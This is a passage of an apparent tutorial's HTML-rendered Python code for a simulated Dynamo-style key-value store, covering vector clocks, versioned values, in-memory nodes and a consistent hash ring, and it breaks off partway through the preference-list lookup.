        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Returns True if self is causally AFTER other.

        self dominates other when:
          - Every counter in self is &amp;gt;= the same counter in other, AND
          - At least one counter in self is strictly greater.

        Meaning: self has seen everything other has seen, plus more.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;all_keys&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;at_least_one_greater&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_keys&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;self_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;other_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self_val&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;other_val&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;  &lt;span class="c1"&gt;# self is missing something other has seen
&lt;/span&gt;            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self_val&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;other_val&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;at_least_one_greater&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;at_least_one_greater&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Merge two clocks by taking the max of each counter.
        Used after resolving a conflict to produce a new clock
        that has &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;seen&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; everything both conflicting versions saw.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;all_keys&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;merged&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;max&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_keys&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;merged&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Part 2: Versioned Value
&lt;/h3&gt;

&lt;p&gt;Every value stored in Dynamo is wrapped with its vector clock. This pairing is what allows the coordinator to compare versions during reads and detect conflicts.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nd"&gt;@dataclass&lt;/span&gt;
&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    A value paired with its causal history (vector clock).

    When a client reads, they get back a VersionedValue.
    When they write an update, they must include the context
    (the vector clock they read) so Dynamo knows what version
    they&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re building on top of.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;object&lt;/span&gt;
    &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VersionedValue(value=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;, clock=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Part 3: Simulated Node
&lt;/h3&gt;

&lt;p&gt;In real Dynamo each node is a separate process. Here we simulate them as in-memory objects. The key detail: each node has its own local &lt;code&gt;storage&lt;/code&gt; dict. Nodes can be marked as &lt;code&gt;down&lt;/code&gt; to simulate failures.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Simulates a single Dynamo storage node.

    In production this would be a separate server with disk storage.
    Here it&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s an in-memory dict so we can demo the logic without networking.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node_id&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;          &lt;span class="c1"&gt;# Position on the consistent hash ring
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;           &lt;span class="c1"&gt;# Toggle to simulate node failures
&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versioned_value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Store a versioned value. Returns False if the node is down.

        We store a LIST of versions per key, because a node might
        hold multiple concurrent (conflicting) versions until they
        are resolved by the application.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
        &lt;span class="c1"&gt;# In a real node this would be written to disk (e.g. BerkeleyDB)
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;versioned_value&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Return all versions of a key. Returns None if the node is down.
        A healthy node with no data for the key returns an empty list.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[])&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;DOWN&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;token=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;DynamoNode(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;status&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Part 4: Consistent Hash Ring
&lt;/h3&gt;

&lt;p&gt;The ring maps keys to nodes. We sort nodes by their token (position) and use a clockwise walk to find the coordinator and preference list for any key.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;hashlib&lt;/span&gt;


&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;ConsistentHashRing&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Maps any key to an ordered list of N nodes (the preference list).

    Nodes are placed at fixed positions (tokens) on a conceptual ring
    from 0 to 2^32. A key hashes to a position, then walks clockwise
    to find its nodes.

    This means adding/removing one node only rebalances ~1/N of keys,
    rather than reshuffling everything like modulo hashing would.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;]):&lt;/span&gt;
        &lt;span class="c1"&gt;# Sort nodes by token so we can do clockwise lookup efficiently
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Consistent hash of a key into the ring&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s token space.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="c1"&gt;# Use MD5 for a simple, evenly distributed hash.
&lt;/span&gt;        &lt;span class="c1"&gt;# Real Dynamo uses a more sophisticated hash (e.g., SHA-1).
&lt;/span&gt;        &lt;span class="n"&gt;digest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;hashlib&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;()).&lt;/span&gt;&lt;span class="nf"&gt;hexdigest&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;digest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Return the first N nodes clockwise from key&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s hash position.

        These are the nodes responsible for storing this key.
        The first node in the list is the coordinator — it receives
        the client request and fans out to the others.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

        &lt;span class="n"&gt;key_hash&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;_hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Find the first node whose token is &amp;gt;= key's hash (clockwise)
&lt;/span&gt;        &lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;key_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;
            &lt;span class="c1"&gt;# If key_hash is greater than all tokens, wrap around to node 0
&lt;/span&gt;            &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

        &lt;span class="c1"&gt;# Walk clockwise, collecting N unique nodes
